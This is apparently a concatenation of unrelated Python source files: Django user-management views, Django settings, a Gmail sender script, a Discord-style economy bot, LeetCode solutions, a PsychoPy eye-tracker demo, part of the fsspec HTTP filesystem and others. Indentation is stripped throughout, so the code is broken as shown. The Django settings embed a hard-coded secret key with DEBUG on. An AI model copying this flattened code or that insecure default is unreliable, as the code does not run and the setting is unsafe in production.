from casepro.orgs_ext.mixins import OrgFormMixin
from casepro.statistics.models import DailyCount
from casepro.utils import month_range, str_to_bool
from .forms import OrgUserForm, PartnerUserForm, UserForm
from .models import Profile
class UserUpdateMixin(OrgFormMixin):
"""
Mixin for views that update user
"""
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs["user"] = self.get_user()
return kwargs
def derive_initial(self):
initial = super().derive_initial()
initial["name"] = self.object.profile.full_name
if self.request.org:
initial["role"] = self.object.get_role(self.request.org)
initial["partner"] = self.object.get_partner(self.request.org)
return initial
def post_save(self, obj):
obj = super().post_save(obj)
data = self.form.cleaned_data
obj.profile.full_name = data["name"]
obj.profile.change_password = data.get("change_password", False)
obj.profile.must_use_faq = data.get("must_use_faq", False)
obj.profile.save(update_fields=("full_name", "change_password", "must_use_faq"))
if "role" in data:
role = data["role"]
partner = data["partner"] if "partner" in data else self.get_partner()
obj.update_role(self.request.org, role, partner)
# set new password if provided
password = data["new_password"]
if password:
obj.set_password(password)
obj.save()
update_session_auth_hash(self.request, obj)
return obj
class UserCRUDL(SmartCRUDL):
model = User
actions = ("create", "create_in", "update", "read", "self", "delete", "list")
class Create(OrgPermsMixin, OrgFormMixin, SmartCreateView):
"""
Form used by org admins to create any kind of user, and used by superusers to create unattached users
"""
permission = "profiles.profile_user_create"
success_url = "@profiles.user_list"
def get_form_class(self):
return OrgUserForm if self.request.org else UserForm
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs["user"] = self.get_user()
return kwargs
def derive_fields(self):
if self.request.org:
return (
"name",
"role",
"partner",
"email",
"password",
"confirm_password",
"change_password",
"must_use_faq",
)
else:
return "name", "email", "password", "confirm_password", "change_password", "must_use_faq"
def save(self, obj):
org = self.request.org
name = self.form.cleaned_data["name"]
email = self.form.cleaned_data["email"]
password = self.form.cleaned_data["password"]
change_password = self.form.cleaned_data["change_password"]
must_use_faq = self.form.cleaned_data["must_use_faq"]
if org:
role = self.form.cleaned_data["role"]
partner = self.form.cleaned_data["partner"]
if partner:
self.object = Profile.create_partner_user(
org, partner, role, name, email, password, change_password, must_use_faq
)
else:
self.object = Profile.create_org_user(org, name, email, password, change_password, must_use_faq)
else:
self.object = Profile.create_user(name, email, password, change_password, must_use_faq)
def get_success_url(self):
return reverse("profiles.user_read", args=[self.object.pk])
class CreateIn(PartnerPermsMixin, OrgFormMixin, SmartCreateView):
"""
Form for creating partner-level users in a specific partner
"""
permission = "profiles.profile_user_create_in"
form_class = PartnerUserForm
fields = ("name", "role", "email", "password", "confirm_password", "change_password", "must_use_faq")
@classmethod
def derive_url_pattern(cls, path, action):
return r"^user/create_in/(?P<partner_id>\d+)/$"
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs["user"] = self.get_user()
return kwargs
def get_partner(self):
return Partner.get_all(self.request.org).get(pk=self.kwargs["partner_id"])
def save(self, obj):
org = self.request.org
partner = self.get_partner()
role = self.form.cleaned_data["role"]
name = self.form.cleaned_data["name"]
email = self.form.cleaned_data["email"]
password = self.form.cleaned_data["password"]
change_password = self.form.cleaned_data["change_password"]
must_use_faq = self.form.cleaned_data["must_use_faq"]
self.object = Profile.create_partner_user(
org, partner, role, name, email, password, change_password, must_use_faq
)
def get_success_url(self):
return reverse("profiles.user_read", args=[self.object.pk])
class Update(PartnerPermsMixin, UserUpdateMixin, SmartUpdateView):
"""
Form for updating any kind of user by another user
"""
permission = "profiles.profile_user_update"
form_class = UserForm
def get_form_class(self):
if self.request.org:
if self.request.user.get_partner(self.request.org):
return PartnerUserForm
else:
return OrgUserForm
else:
return UserForm
def get_queryset(self):
if self.request.org:
return self.request.org.get_users()
else:
return super().get_queryset()
def get_partner(self):
return self.get_object().get_partner(self.request.org)
def derive_fields(self):
profile_fields = ["name"]
user_fields = ["email", "new_password", "confirm_password", "change_password", "must_use_faq"]
if self.request.org:
user_partner = self.request.user.get_partner(self.request.org)
if user_partner:
profile_fields += ["role"] # partner users can't change a user's partner
else:
profile_fields += ["role", "partner"]
return tuple(profile_fields + user_fields)
def get_success_url(self):
return reverse("profiles.user_read", args=[self.object.pk])
class Self(OrgPermsMixin, UserUpdateMixin, SmartUpdateView):
"""
Limited update form for users to edit their own profiles
"""
form_class = UserForm
fields = ("name", "email", "current_password", "new_password", "confirm_password")
success_url = "@cases.inbox"
success_message = _("Profile updated")
title = _("Edit My Profile")
@classmethod
def derive_url_pattern(cls, path, action):
return r"^profile/self/$"
def has_permission(self, request, *args, **kwargs):
return self.request.user.is_authenticated
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs["user"] = self.get_user()
kwargs["require_password_change"] = self.object.profile.change_password
return kwargs
def get_object(self, queryset=None):
if not self.request.user.has_profile():
raise Http404(_("User doesn't have a profile"))
return self.request.user
def post_save(self, obj):
obj = super().post_save(obj)
obj.profile.change_password = False
obj.profile.save(update_fields=("change_password",))
return obj
class Read(OrgPermsMixin, SmartReadView):
permission = "profiles.profile_user_read"
def derive_title(self):
if self.object == self.request.user:
return _("My Profile")
else:
return super().derive_title()
def derive_fields(self):
profile_fields = ["name"]
user_fields = ["email"]
if self.request.org:
user_partner = self.request.user.get_partner(self.request.org)
if user_partner:
profile_fields += ["role"] # partner users can't change a user's partner
else:
profile_fields += ["role", "partner"]
return tuple(profile_fields + user_fields)
def get_queryset(self):
if self.request.org:
user_partner = self.request.user.get_partner(self.request.org)
if user_partner:
return user_partner.get_users()
return self.request.org.get_users()
else:
return super().get_queryset()
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
org = self.request.org
user = self.request.user
if self.object == user:
edit_button_url = reverse("profiles.user_self")
can_delete = False # can't delete yourself
elif user.can_edit(org, self.object):
edit_button_url = reverse("profiles.user_update", args=[self.object.pk])
can_delete = bool(org) # can only delete in context of an org
else:
edit_button_url = None
can_delete = False
context["context_data_json"] = {"user": self.object.as_json(full=True, org=org)}
context["edit_button_url"] = edit_button_url
context["can_delete"] = can_delete
context["summary"] = self.get_summary(org, self.object) if org else {}
return context
def get_summary(self, org, user):
return {"total_replies": DailyCount.get_by_user(org, [user], DailyCount.TYPE_REPLIES, None, None).total()}
class Delete(OrgPermsMixin, SmartDeleteView):
cancel_url = "@profiles.user_list"
def has_permission(self, request, *args, **kwargs):
user = self.get_object()
return request.user.can_edit(request.org, user) and request.user != user
def get_queryset(self):
return self.request.org.get_users()
def post(self, request, *args, **kwargs):
user = self.get_object()
user.remove_from_org(request.org)
return HttpResponse(status=204)
class List(OrgPermsMixin, SmartListView):
"""
JSON endpoint to fetch users with their activity information
"""
permission = "profiles.profile_user_list"
def get(self, request, *args, **kwargs):
org = request.org
partner_id = request.GET.get("partner")
non_partner = str_to_bool(self.request.GET.get("non_partner", ""))
with_activity = str_to_bool(self.request.GET.get("with_activity", ""))
if non_partner:
users = org.administrators.all()
elif partner_id:
users = Partner.objects.get(org=org, pk=partner_id).get_users()
else:
users = org.get_users()
users = list(users.order_by("profile__full_name"))
# get reply statistics
if with_activity:
replies_total = DailyCount.get_by_user(org, users, DailyCount.TYPE_REPLIES, None, None).scope_totals()
replies_this_month = DailyCount.get_by_user(
org, users, DailyCount.TYPE_REPLIES, *month_range(0)
).scope_totals()
replies_last_month = DailyCount.get_by_user(
org, users, DailyCount.TYPE_REPLIES, *month_range(-1)
).scope_totals()
cases_total = DailyCount.get_by_user(
org, users, DailyCount.TYPE_CASE_OPENED, None, None
).scope_totals()
cases_opened_this_month = DailyCount.get_by_user(
org, users, DailyCount.TYPE_CASE_OPENED, *month_range(0)
).scope_totals()
cases_closed_this_month = DailyCount.get_by_user(
org, users, DailyCount.TYPE_CASE_CLOSED, *month_range(0)
).scope_totals()
def as_json(user):
obj = user.as_json(full=True, org=org)
if with_activity:
obj.update(
{
"replies": {
"this_month": replies_this_month.get(user, 0),
"last_month": replies_last_month.get(user, 0),
"total": replies_total.get(user, 0),
},
"cases": {
"opened_this_month": cases_opened_this_month.get(user, 0),
"closed_this_month": cases_closed_this_month.get(user, 0),
"total": cases_total.get(user, 0),
},
}
)
return obj
return JsonResponse({"results": [as_json(u) for u in users]})
|
py | 1a38a0578ee147127c0d08ad5f5620229ee3626e | from enum import Enum
RACE_OR_HISPANIC_COL = "race_and_ethnicity"
HISPANIC_COL = "hispanic_or_latino"
RACE_COL = "race"
AGE_COL = "age"
SEX_COL = "sex"
STATE_FIPS_COL = "state_fips"
STATE_NAME_COL = "state_name"
COUNTY_FIPS_COL = "county_fips"
COUNTY_NAME_COL = "county_name"
POPULATION_COL = "population"
# TODO add Asian/Pacific Islander combined, and Indigenous combined
class Race(Enum):
AIAN = "American Indian and Alaska Native"
AIAN_NH = "American Indian and Alaska Native (Non-Hispanic)"
ASIAN = "Asian"
ASIAN_NH = "Asian (Non-Hispanic)"
BLACK = "Black or African American"
BLACK_NH = "Black or African American (Non-Hispanic)"
HISP = "Hispanic or Latino"
NHPI = "Native Hawaiian and Pacific Islander"
NHPI_NH = "Native Hawaiian and Pacific Islander (Non-Hispanic)"
NH = "Not Hispanic or Latino"
OTHER = "Some other race"
OTHER_NH = "Some other race (Non-Hispanic)"
TOTAL = "Total"
MULTI = "Two or more races"
MULTI_NH = "Two or more races (Non-Hispanic)"
WHITE = "White"
WHITE_NH = "White (Non-Hispanic)"
|
py | 1a38a1ba622f8c2c31d8144f6e07551267efd1e6 | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from .char_embedding import CharacterEmbedding
from .contextual_token_embedding import ContextualTokenEmbedding
from .dict_embedding import DictEmbedding
from .embedding_base import EmbeddingBase
from .embedding_list import EmbeddingList
from .mlp_embedding import MLPEmbedding
from .word_embedding import WordEmbedding
from .word_seq_embedding import WordSeqEmbedding
__all__ = [
"EmbeddingBase",
"EmbeddingList",
"WordEmbedding",
"DictEmbedding",
"CharacterEmbedding",
"ContextualTokenEmbedding",
"WordSeqEmbedding",
"MLPEmbedding",
]
|
py | 1a38a1bf20343bad2e418c197ab64270307dbbb8 | from langumo.building.base import Builder, BuildPipeline
from langumo.building.miscellaneous import (ImportFrom, ExportTo, Residual,
StackOutputs)
from langumo.building.parsing import Parser, ParseRawFile
from langumo.building.shuffling import ShuffleLines
from langumo.building.tokenization import TrainTokenizer, TokenizeSentences
from langumo.building.splitting import SplitValidation
from langumo.building.mergence import MergeFiles
|
py | 1a38a250c06d13588e03a8fed990a16441dc209a | class Cud():
def __init__(self):
#print("__init__ called")
pass
def __repr__(self):
print("__repr__ called")
return ""
def __lt__(self, other):
print("__lt__ called")
def __le__(self, other):
print("__le__ called")
def __eq__(self, other):
print("__eq__ called")
def __ne__(self, other):
print("__ne__ called")
def __ge__(self, other):
print("__ge__ called")
def __gt__(self, other):
print("__gt__ called")
def __abs__(self):
print("__abs__ called")
def __add__(self, other):
print("__add__ called")
def __and__(self, other):
print("__and__ called")
def __floordiv__(self, other):
print("__floordiv__ called")
def __index__(self, other):
print("__index__ called")
def __inv__(self):
print("__inv__ called")
def __invert__(self):
print("__invert__ called")
def __lshift__(self, val):
print("__lshift__ called")
def __mod__(self, val):
print("__mod__ called")
def __mul__(self, other):
print("__mul__ called")
def __matmul__(self, other):
print("__matmul__ called")
def __neg__(self):
print("__neg__ called")
def __or__(self, other):
print("__or__ called")
def __pos__(self):
print("__pos__ called")
def __pow__(self, val):
print("__pow__ called")
def __rshift__(self, val):
print("__rshift__ called")
def __sub__(self, other):
print("__sub__ called")
def __truediv__(self, other):
print("__truediv__ called")
def __div__(self, other):
print("__div__ called")
def __xor__(self, other):
print("__xor__ called")
def __iadd__(self, other):
print("__iadd__ called")
return self
def __isub__(self, other):
print("__isub__ called")
return self
def __dir__(self):
return ['a', 'b', 'c']
cud1 = Cud()
cud2 = Cud()
try:
+cud1
except TypeError:
print("SKIP")
raise SystemExit
# the following require MICROPY_PY_ALL_SPECIAL_METHODS
+cud1
-cud1
~cud1
cud1 * cud2
cud1 / cud2
cud2 // cud1
cud1 += cud2
cud1 -= cud2
# test that dir() delegates to __dir__ special method
print(dir(cud1))
# test that dir() does not delegate to __dir__ for the type
print('a' in dir(Cud))
# TODO: the following operations are not supported on every ports
#
# ne is not supported, !(eq) is called instead
#cud1 != cud2
#
# binary and is not supported
# cud1 & cud2
#
# binary lshift is not supported
# cud1<<1
#
# modulus is not supported
# cud1 % 2
#
# binary or is not supported
# cud1 | cud2
#
# pow is not supported
# cud1**2
#
# rshift is not suported
# cud1>>1
#
# xor is not supported
# cud1^cud2
#
# in the followin test, cpython still calls __eq__
# cud3=cud1
# cud3==cud1
|
py | 1a38a317d0eec493c94bf753d9e903d2ffd57739 | #!/usr/bin/env python3
"""
Read class averages mrc file and save it to jpg.
Automatically remove the edges.
INPUT: mrcs file of 2D class averages
OUTPUT: a dir for the jpg output
The name of the jpg file would be "particlename_diamxxkxx_classnumber.jpg"
"""
import os
import mrcfile
import numpy as np
from PIL import Image
import argparse
import shutil
from . import imgprep
# from .lib import utils
def setupParserOptions():
ap = argparse.ArgumentParser()
ap.add_argument('-i', '--input',
help="Input mrcs file of 2D class averages.")
ap.add_argument('-n', '--name', default='particle',
help="Name of the particle")
ap.add_argument('-o', '--output', default='2DAssess',
help="Output jpg dir.")
args = vars(ap.parse_args())
return args
def mrcs2jpg(args):
print('Converting mrcs to jpg....')
os.chdir(os.path.abspath(os.path.dirname(args['input']))) # navigate to the par dir of input file
try:
shutil.rmtree(args['output'])
except OSError:
pass
os.mkdir(args['output'])
os.mkdir(os.path.join(args['output'], 'data'))
avg_mrc = mrcfile.open(os.path.basename(args['input'])).data
if len(avg_mrc.shape) == 3:
num_part = avg_mrc.shape[0]
elif len(avg_mrc.shape) == 2:
num_part = 1
for i in range(num_part):
new_img = avg_mrc[i,:,:]
if np.sum(new_img) > 1e-7 or np.sum(new_img) < -1e-7:
new_img = imgprep.cutByRadius(new_img)
new_img = ((new_img-new_img.min())/((new_img.max()-new_img.min())+1e-7)*255).astype('uint8')
new_img = Image.fromarray(new_img)
new_img = new_img.convert("L")
new_img.save(os.path.join(args['output'], 'data', (args['name'] + '_' + str(i+1) + '.jpg')))
if __name__ == '__main__':
args = setupParserOptions()
mrcs2jpg(args)
|
py | 1a38a32e9a984012d7a5ce255d06711175e0f298 | import smtplib
import ast
import getpass
import sys
#ENTER DETAILS BELOW
DEFAULT_RECIPIENT = ''
pwd = ""
def send_mail(mailfile,SUBJECT,recipient = DEFAULT_RECIPIENT):
if recipient == '.':
recipient = DEFAULT_RECIPIENT
s = smtplib.SMTP('smtp.gmail.com', 587)
s.starttls()
s.login(DEFAULT_RECIPIENT, str(pwd))
if mailfile == '.':
mailfile = "my_mail_auto.txt"
f = open(mailfile,'w')
f.write("Test Mail")
f.close()
f = open(mailfile,'r')
TEXT = f.read()
f.close()
message = 'Subject: {}\n\n{}'.format(SUBJECT, TEXT)
s.sendmail(DEFAULT_RECIPIENT, recipient, message)
s.quit()
if __name__ == '__main__':
if len(sys.argv)<3:
print("Check number of arguments: py mail_sender.py mailfile(.) subjectstr recepient") #recipient argument is mandatory
sys.exit(-1)
send_mail(sys.argv[1]," ".join(sys.argv[2:-1]),sys.argv[-1])
|
py | 1a38a3637d60dd9b23b957fb88a407a2638187e3 | ##############################################################################
#
# Copyright (c) 2005 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Tests class initialization.
"""
def test_InitializeClass():
"""Test that InitializeClass (default__class_init__)
works in specific corner cases.
Check when the class has an ExtensionClass as attribute.
>>> import ExtensionClass
>>> from AccessControl.class_init import InitializeClass
>>> class AnotherClass(ExtensionClass.Base):
... _need__name__ = 1
>>> class C:
... foo = AnotherClass
>>> InitializeClass(C)
"""
from doctest import DocTestSuite
import unittest
def test_suite():
return unittest.TestSuite((
DocTestSuite(),
))
|
py | 1a38a514b12707cf0d751b97c056318f3a3caf78 | """
Django settings for app project.
Generated by 'django-admin startproject' using Django 2.1.15.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'z0l9u3^wdjp04fog#4cu*c4f%z^-k0jcrxyb6s#0p0)jyzr2x2'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
"main",
'user',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'app.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'HOST': os.environ.get('DB_HOST'),
'NAME': os.environ.get('DB_NAME'),
'USER': os.environ.get('DB_USER'),
'PASSWORD': os.environ.get('DB_PASS')
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
AUTH_USER_MODEL = 'main.User' |
py | 1a38a542d4601752471a77dfeaef7ccd2ec7316d | #!/usr/bin/env python
from setuptools import setup, find_packages
import pystashlog
import pathlib
HERE = pathlib.Path(__file__).parent.resolve()
# Get the long description from the README file
long_description = (HERE / 'README.md').read_text(encoding='utf-8')
setup(
name='pystashlog',
version=pystashlog.__version__,
description='Logstash client library for Python',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/wuriyanto48/pystashlog',
author='wuriyanto',
author_email='[email protected]',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries :: Python Modules',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3 :: Only',
],
keywords='logstash, elk, elastic, logstash client, kibana',
packages=find_packages(exclude=['tests*', 'env', 'elk', '_examples']),
python_requires='>=3.5',
project_urls={
'Bug Reports': 'https://github.com/wuriyanto48/pystashlog/issues',
'Source': 'https://github.com/wuriyanto48/pystashlog/',
},
) |
py | 1a38a57dad6b297bd7ec0c324bf412da6f2ca602 | import voltage
from voltage.ext import commands
import random
from utils import get_db, check_account, cooldown
# (name, multiplier)
people = [
("Enoki", 1),
("Insert", 1.2),
("NotJan", 0.9),
("Jan", 1),
("Delta", 1.2),
("z3", 0.1),
("atal", 1.5),
("Fatal", 1.2),
]
# (message, (min, max), weight)
scenarios = [
("{name} saw you begging and graciously gave you {amount} SusCoins.", (1, 100), 1),
("WOW, {name} gave you {amount} SusCoins for because they're like very kind and stuff.", (50, 100), 0.8),
]
def setup(client) -> commands.Cog:
economy = commands.Cog("Economy", "Simple economy commands.")
@check_account()
@economy.command(aliases=['bal', 'b'])
async def balance(ctx):
"""Check your balance."""
conn = get_db()
cur = conn.cursor()
cur.execute("SELECT balance FROM economy WHERE user_id = ?", (ctx.author.id,))
bal = cur.fetchone()[0]
await ctx.reply(f"Your balance is **__{bal}__** SusCoins.")
# @cooldown("beg", 20)
@check_account()
@economy.command()
async def beg(ctx):
"""Beg for money."""
conn = get_db()
cur = conn.cursor()
cur.execute("SELECT balance FROM economy WHERE user_id = ?", (ctx.author.id,))
bal = cur.fetchone()[0]
person = random.choice(people)
scenario = random.choices(scenarios, weights=[x[2] for x in scenarios])[0]
amount = int(random.randint(scenario[1][0], scenario[1][1]) * person[1])
cur.execute("UPDATE economy SET balance = balance + ? WHERE user_id = ?", (amount, ctx.author.id))
conn.commit()
cur.close()
conn.close()
await ctx.reply(scenario[0].format(name=f"**{person[0]}**", amount=f"**__{amount}__**"))
return economy
|
py | 1a38a87c531b74362f6f9bcb12a3ae77b0ebf8f3 | # 107. Binary Tree Level Order Traversal II
# [email protected]
# Given a binary tree, return the bottom-up level order traversal of its nodes' values. (ie, from left to right, level by level from leaf to root).
# For example:
# Given binary tree [3,9,20,null,null,15,7],
# 3
# / \
# 9 20
# / \
# 15 7
# return its bottom-up level order traversal as:
# [
# [15,7],
# [9,20],
# [3]
# ]
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def levelOrderBottom(self, root):
"""
:type root: TreeNode
:rtype: List[List[int]]
"""
# sol 1:
# BFS iterative
# runtime: 48ms
if not root:
return []
queue = [root]
res = []
while queue:
vals = [node.val if node else None for node in queue]
res.append(vals)
queue = [leaf for q in queue for leaf in (q.left, q.right) if leaf]
return res[::-1]
# sol 2
# BFS iterative
# runtime: 47ms
if not root:
return []
queue = [(root, 0)]
res = collections.defaultdict(list)
while queue:
node, depth = queue.pop()
res[depth].append(node.val)
if node.right:
queue.append((node.right, depth + 1))
if node.left:
queue.append((node.left, depth + 1))
return res.values()[::-1]
|
py | 1a38a8968148bebe9c64a86d397fd9618862bf03 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Simple iohub eye tracker device demo.
Select which tracker to use by setting the TRACKER variable below.
"""
from __future__ import absolute_import, division, print_function
from psychopy import core, visual
from psychopy.iohub import launchHubServer
from psychopy.iohub.util import hideWindow, showWindow
# Eye tracker to use ('mouse', 'eyelink', 'gazepoint', or 'tobii')
TRACKER = 'mouse'
eyetracker_config = dict(name='tracker')
devices_config = {}
if TRACKER == 'mouse':
devices_config['eyetracker.hw.mouse.EyeTracker'] = eyetracker_config
elif TRACKER == 'eyelink':
eyetracker_config['model_name'] = 'EYELINK 1000 DESKTOP'
eyetracker_config['runtime_settings'] = dict(sampling_rate=1000, track_eyes='RIGHT')
devices_config['eyetracker.hw.sr_research.eyelink.EyeTracker'] = eyetracker_config
elif TRACKER == 'gazepoint':
devices_config['eyetracker.hw.gazepoint.gp3.EyeTracker'] = eyetracker_config
elif TRACKER == 'tobii':
devices_config['eyetracker.hw.tobii.EyeTracker'] = eyetracker_config
else:
print("{} is not a valid TRACKER name; please use 'mouse', 'eyelink', 'gazepoint', or 'tobii'.".format(TRACKER))
core.quit()
# Number if 'trials' to run in demo
TRIAL_COUNT = 2
# Maximum trial time / time timeout
T_MAX = 60.0
win = visual.Window((1920, 1080),
units='pix',
fullscr=True,
allowGUI=False,
colorSpace='rgb255',
monitor='55w_60dist',
color=[128, 128, 128]
)
win.setMouseVisible(False)
text_stim = visual.TextStim(win, text="Start of Experiment",
pos=[0, 0], height=24,
color='black', units='pix', colorSpace='named',
wrapWidth=win.size[0] * .9)
text_stim.draw()
win.flip()
io = launchHubServer(window=win, **devices_config)
# Get some iohub devices for future access.
keyboard = io.getDevice('keyboard')
tracker = io.getDevice('tracker')
# Minimize the PsychoPy window if needed
hideWindow(win)
# Display calibration gfx window and run calibration.
result = tracker.runSetupProcedure()
print("Calibration returned: ", result)
# Maximize the PsychoPy window if needed
showWindow(win)
gaze_ok_region = visual.Circle(win, lineColor='black', radius=300, units='pix', colorSpace='named')
gaze_dot = visual.GratingStim(win, tex=None, mask='gauss', pos=(0, 0),
size=(40, 40), color='green', colorSpace='named', units='pix')
text_stim_str = 'Eye Position: %.2f, %.2f. In Region: %s\n'
text_stim_str += 'Press space key to start next trial.'
missing_gpos_str = 'Eye Position: MISSING. In Region: No\n'
missing_gpos_str += 'Press space key to start next trial.'
text_stim.setText(text_stim_str)
# Run Trials.....
t = 0
while t < TRIAL_COUNT:
io.clearEvents()
tracker.setRecordingState(True)
run_trial = True
tstart_time = core.getTime()
while run_trial is True:
# Get the latest gaze position in display coord space.
gpos = tracker.getLastGazePosition()
# Update stim based on gaze position
valid_gaze_pos = isinstance(gpos, (tuple, list))
gaze_in_region = valid_gaze_pos and gaze_ok_region.contains(gpos)
if valid_gaze_pos:
# If we have a gaze position from the tracker, update gc stim and text stim.
if gaze_in_region:
gaze_in_region = 'Yes'
else:
gaze_in_region = 'No'
text_stim.text = text_stim_str % (gpos[0], gpos[1], gaze_in_region)
gaze_dot.setPos(gpos)
else:
# Otherwise just update text stim
text_stim.text = missing_gpos_str
# Redraw stim
gaze_ok_region.draw()
text_stim.draw()
if valid_gaze_pos:
gaze_dot.draw()
# Display updated stim on screen.
flip_time = win.flip()
# Check any new keyboard char events for a space key.
# If one is found, set the trial end variable.
#
if keyboard.getPresses(keys=' '):
run_trial = False
elif core.getTime()-tstart_time > T_MAX:
run_trial = False
win.flip()
# Current Trial is Done
# Stop eye data recording
tracker.setRecordingState(False)
t += 1
# All Trials are done
# End experiment
win.close()
tracker.setConnectionState(False)
io.quit()
core.quit()
|
py | 1a38a9882a9bbc9a0339f823ee2a244dc597ef5a | class Solution:
def XXX(self, nums: List[int]) -> List[List[int]]:
flag = [0 for i in nums]
res = [[]]
for i in nums:
tem = deepcopy(res)
for j in range(len(tem)):
tem[j].append(i)
res.extend(tem)
return res
|
py | 1a38a9d12e211a21d385cfef7d206b2371a6537d | from __future__ import print_function, division, absolute_import
import re
import requests
from fsspec import AbstractFileSystem
from fsspec.utils import tokenize, DEFAULT_BLOCK_SIZE
# https://stackoverflow.com/a/15926317/3821154
ex = re.compile(r"""<a\s+(?:[^>]*?\s+)?href=(["'])(.*?)\1""")
ex2 = re.compile(r"""(http[s]?://[-a-zA-Z0-9@:%_+.~#?&/=]+)""")
class HTTPFileSystem(AbstractFileSystem):
"""
Simple File-System for fetching data via HTTP(S)
``ls()`` is implemented by loading the parent page and doing a regex
match on the result. If simple_link=True, anything of the form
"http(s)://server.com/stuff?thing=other"; otherwise only links within
HTML href tags will be used.
"""
sep = '/'
def __init__(self, **storage_options):
"""
Parameters
----------
block_size: int
Blocks to read bytes; if 0, will default to raw requests file-like
objects instead of HTTPFile instances
simple_links: bool
If True, will consider both HTML <a> tags and anything that looks
like a URL; if False, will consider only the former.
storage_options: key-value
May be credentials, e.g., `{'auth': ('username', 'pword')}` or any
other parameters passed on to requests
"""
AbstractFileSystem.__init__(self)
self.block_size = storage_options.pop('block_size', DEFAULT_BLOCK_SIZE)
self.simple_links = storage_options.pop('simple_links', True)
self.kwargs = storage_options
self.session = requests.Session()
def _strip_protocol(self, path):
""" For HTTP, we always want to keep the full URL
"""
return path
def ls(self, url, detail=True):
# ignoring URL-encoded arguments
r = requests.get(url, **self.kwargs)
if self.simple_links:
links = ex2.findall(r.text) + ex.findall(r.text)
else:
links = ex.findall(r.text)
out = set()
for l in links:
if isinstance(l, tuple):
l = l[1]
if l.startswith('http'):
if l.replace('https', 'http').startswith(
url.replace('https', 'http')):
out.add(l)
else:
if l not in ['..', '../']:
# Ignore FTP-like "parent"
out.add('/'.join([url.rstrip('/'), l.lstrip('/')]))
if detail:
return [{'name': u, 'type': 'directory'
if u.endswith('/') else 'file'} for u in out]
else:
return list(sorted(out))
def cat(self, url):
r = requests.get(url, **self.kwargs)
r.raise_for_status()
return r.content
def mkdirs(self, url):
"""Make any intermediate directories to make path writable"""
raise NotImplementedError
def _open(self, url, mode='rb', block_size=None, **kwargs):
"""Make a file-like object
Parameters
----------
url: str
Full URL with protocol
mode: string
must be "rb"
block_size: int or None
Bytes to download in one request; use instance value if None.
kwargs: key-value
Any other parameters, passed to requests calls
"""
if mode != 'rb':
raise NotImplementedError
block_size = block_size if block_size is not None else self.block_size
kw = self.kwargs.copy()
kw.update(kwargs)
kw.pop('autocommit', None)
if block_size:
return HTTPFile(url, self.session, block_size, **kw)
else:
kw['stream'] = True
r = self.session.get(url, **kw)
r.raise_for_status()
r.raw.decode_content = True
return r.raw
def ukey(self, url):
"""Unique identifier; assume HTTP files are static, unchanging"""
return tokenize(url, self.kwargs, self.protocol)
def size(self, url):
"""Size in bytes of the file at path"""
return file_size(url, session=self.session, **self.kwargs)
class HTTPFile(object):
"""
